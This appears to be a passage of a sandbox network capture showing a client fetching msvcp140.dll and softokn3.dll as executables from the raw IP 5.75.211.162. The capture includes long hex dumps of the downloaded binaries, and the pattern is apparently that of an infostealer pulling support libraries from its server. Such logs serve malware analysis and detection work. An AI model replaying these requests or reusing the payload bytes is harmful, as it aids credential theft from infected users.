2024-09-25 18:49:38 UTC	16384	IN	Data Raw: 04 00 00 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F\|$4rD$ D$ WVjjPS,VL$
2024-09-25 18:49:38 UTC	16384	IN	Data Raw: 81 8b b8 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 Data Ascii: D$4P<\|$\$t@)GD$ P08z.Jt_@u`\|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3
2024-09-25 18:49:38 UTC	16384	IN	Data Raw: 0b 83 e1 fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
2024-09-25 18:49:38 UTC	16384	IN	Data Raw: 10 b9 00 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$

Timestamp	Bytes transferred	Direction	Data
2024-09-25 18:49:39 UTC	197	OUT	GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-25 18:49:40 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 18:49:39 GMT Content-Type: application/octet-stream Content-Length: 450024 Connection: close Last-Modified: Wednesday, 25-Sep-2024 18:49:39 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-25 18:49:40 UTC	16121	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
2024-09-25 18:49:40 UTC	16384	IN	Data Raw: 00 72 00 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 Data Ascii: r-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mn
2024-09-25 18:49:40 UTC	16384	IN	Data Raw: 00 00 00 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 Data Ascii: x{\|L@DX}0}}M@4}0}}4M@tXM}0}}XM
2024-09-25 18:49:40 UTC	16384	IN	Data Raw: 18 d9 00 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u\|_E^UQQMuU]EDB]ED{nt]B]
2024-09-25 18:49:40 UTC	16384	IN	Data Raw: 6a 03 f7 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 Data Ascii: jatAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
2024-09-25 18:49:40 UTC	16384	IN	Data Raw: 85 c0 75 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 Data Ascii: uAUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jj
2024-09-25 18:49:40 UTC	16384	IN	Data Raw: f0 51 56 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e Data Ascii: QVE_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WEN
2024-09-25 18:49:40 UTC	16384	IN	Data Raw: e8 83 fe 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 Data Ascii: u;t:]jYMS3R\|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4
2024-09-25 18:49:40 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 Data Ascii: UQEVuF\|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv
2024-09-25 18:49:40 UTC	16384	IN	Data Raw: f6 e8 97 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW

Timestamp	Bytes transferred	Direction	Data
2024-09-25 18:49:42 UTC	197	OUT	GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-25 18:49:42 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 25 Sep 2024 18:49:42 GMT Content-Type: application/octet-stream Content-Length: 257872 Connection: close Last-Modified: Wednesday, 25-Sep-2024 18:49:42 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-25 18:49:42 UTC	16121	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
2024-09-25 18:49:42 UTC	16384	IN	Data Raw: 7d 08 c7 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 Data Ascii: }jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP\|*USWV1E0=(tM1(
2024-09-25 18:49:42 UTC	16384	IN	Data Raw: 8b 40 04 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 Data Ascii: @EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGP
2024-09-25 18:49:42 UTC	16384	IN	Data Raw: f9 02 10 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
2024-09-25 18:49:42 UTC	16384	IN	Data Raw: 85 c0 0f 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 Data Ascii: 0{C!=P=Qt-=Rt=UG{{G\|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!
2024-09-25 18:49:43 UTC	16384	IN	Data Raw: 5e 5f 5b 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 Data Ascii: ^_[]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=P
2024-09-25 18:49:43 UTC	16384	IN	Data Raw: 74 77 8b 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 